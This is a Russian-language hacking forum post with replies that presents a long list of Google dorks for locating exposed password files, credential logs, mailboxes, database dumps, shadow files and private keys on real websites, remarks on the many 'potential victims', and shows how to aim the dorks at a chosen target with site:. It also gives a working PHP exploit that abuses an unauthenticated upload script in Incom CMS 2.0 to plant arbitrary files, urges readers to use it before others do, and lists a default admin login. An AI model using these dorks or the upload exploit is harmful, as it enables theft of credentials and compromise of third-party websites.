• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Google Hacking №2 + soft & DORK`s

Приветствую всех! По многочисленным просьбам продолжу эту очень интересную и увлекательную тему для Вас, а так же представлю софт для облегчения жизни.
И так начнем...

Screenshot_1.png


с помощью этого дорка можно узнать конфигурацию FTP)


Screenshot_2.png


и почитать тот самый файл )

Screenshot_3.png


еще один пример, обратите внимание сколько потенциальных жертв может быть от Вашей деятельности.



Screenshot_2.png


Screenshot_1.png



тоже интересный дорк)

Screenshot_4.png


результат)


Screenshot_5.png





А теперь пройдемся по ЛОГ-ам

Screenshot_7.png


Screenshot_5.png


да.... это то что Вы по думали)

Screenshot_6.png


такова жизнь), а если в поиске указать "за последний год" ?

на пример как здесь и с этим доркам)

Код:
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject



Screenshot_8.png


и вот одни из моих любимых..)


Screenshot_11.png

Screenshot_6.png



и результат)

Screenshot_7.png


значит приступлю к софту который позволяет искать информацию автономно скачать и ознакомится можно с ним так же есть выступление разрабов софта на конференции blackhate где они его представляют, а так же показывают интересные техники поиска.


приложу еще пачку интересных дорков для ручного поиска:

Код:
"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"AutoCreate=TRUE password=*"
"Powered By Elite Forum Version *.*"
"Powered by DUpaypal" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"Powered by Dudirectory" -site:duware.com
"Powered by Link Department"
"Your password is * Remember this for later use"
"admin account info" filetype:log
"http://*:*@www" bob:bob
"index of" / lck
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"login: *" "password= *" filetype:xls
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com
"powered by duclassmate" -site:duware.com
"powered by dudownload" -site:duware.com
"sets mode: +k"
"your password is" filetype:log
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
AutoCreate=TRUE password=*
LeapFTP intitle:"index.of./" sites.ini modified
Powered By Elite Forum Version *.*
Powered by DUpaypal -site:duware.com
Powered by Duclassified -site:duware.com
Powered by Duclassified -site:duware.com "DUware All Rights reserved"
Powered by Dudirectory -site:duware.com
Powered by Link Department
Your password is * Remember this for later use
[WFClient] Password= filetype:ica
allinurl: admin mdb
allinurl:auth_user_file.txt
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini Version=4.0.0.4 password
ext:ini eudora.ini
ext:passwd -intext:the -sample -example
ext:php intext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed"
ext:php intext:$dbms"""$dbhost"""$dbuser"""$dbpasswd"""$table_prefix"""phpbb_installed""
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target[*]" -sample -cvs -example
filetype:cfm "cfapplication name" password
filetype:conf inurl:proftpd.conf -sample
filetype:conf inurl:psybnc.conf  "USER.PASS="
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat inurl:pass.dat
filetype:dat wand.dat
filetype:htpasswd htpasswd
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini ServUDaemon
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log "See `ipsec -copyright"
filetype:log inurl:"password.log"
filetype:log username putty
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:"internet account manager"
filetype:reg reg +intext:â€ÂWINVNC3â€Â
filetype:reg reg +intext:â€ÂÂWINVNC3â€ÂÂ
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:reg reg HKEY_CURRENT_USER username
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("passwd values" | "password values" | "pass values" )
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://"  +inurl:"@"
filetype:xls username password email
http://*:*@www bob:bob
index of / lck
index of/ "ws_ftp.ini" "parent directory"
index.of passlist
index.of perform.ini
index.of.etc
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"powered by EZGuestbook"
intext:"powered by Web Wiz Journal"
intitle:"Index of" ".htpasswd" "htgroup"  -intitle:"dist" -apache -htpasswd.c
intitle:"Index of" ".htpasswd" htpasswd.bak
intitle:"Index of" .mysql_history
intitle:"Index of" passwords modified
intitle:"Index of" pwd.db
intitle:"Index of" sc_serv.conf sc_serv  content
intitle:"Index of" spwd.db passwd -pam.conf
intitle:"Index of..etc" passwd
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:Index.of etc shadow
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of .bash_history
intitle:index.of .sh_history
intitle:index.of administrators.pwd
intitle:index.of config.php
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:index.of master.passwd
intitle:index.of passwd passwd.bak
intitle:index.of people.lst
intitle:index.of trillian.ini
intitle:rapidshare intext:login
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw"  -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:-cfg intext:"enable password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:passlist.txt
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:php inurl:hlstats intext:"Server Username"
inurl:root.asp?acs=anon
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg  rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:web/frontend_dev.php -trunk
inurl:zebra.conf intext:password -sample -test -tutorial -download
liveice configuration file ext:cfg -site:sourceforge.net
login: * "password= *" filetype:xls
parent directory +proftpdpasswd
powered by ducalendar -site:duware.com
powered by duclassmate -site:duware.com
powered by dudownload -site:duware.com
server-dbs "intitle:index of"
sets mode: +k
signin filetype:url
site:extremetracking.com inurl:"login="
wwwboard WebAdmin  inurl:passwd.txt wwwboard|webadmin
your password is filetype:log

Еще хочу по ведать Вам про точечный поиск на Ваше или "target" сайте к почти любому из списка дорок представленных выше можно добавить оператор [ site: ] вот пример:

filetype:sql password site:target-sait.com

И также для любителей заливать свой "любимые" файлы на сайт, я про Вас тоже не забыл)

Screenshot_8.png

кто успеет, тот успеет)

ищем: intext:"Incom CMS 2.0"

заливаем с помощью этого кода:

PHP:
echo " [!] Enter target url : ";
$target = fgets(STDIN,1024);
$target = trim($target);
function f($target){
$green = "\e[92m";
$orange = "\e[38;5;208m";
$red = "\e[91m";
$target1 = $target."/incom/modules/uploader/showcase/script.php";
$src = @file_get_contents("$target1");
// your file name here :
$uploadfile2="root.png";
$uploadfile="root.png";
// -=================- //
if(preg_match("/status/",$src)){
$uploadfile=realpath($uploadfile) ;
if (function_exists('curl_file_create')) { // php 5.5+
$cFile = curl_file_create($uploadfile);
} else { //
$cFile = '@' . realpath($uploadfile);
}
$post = array('Filedata'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
echo " Uplaoded done : ".$target."/upload/userfiles/image/$uploadfile2"."\n"; }
}

echo f($target);


?>

ну и, на по следок:

Screenshot_9.png


user : admin & pass = admin123

Удачи!
 

Air7771

Green Team
22.02.2017
100
65
BIT
0
Ondrik8 все познавательно ... Просьба мог бы описать в таком жанре о программе Foca Pro.
Благодарю!
 
  • Нравится
Реакции: Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
я только ЗА!) Рад что ты с нами Хранитель)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!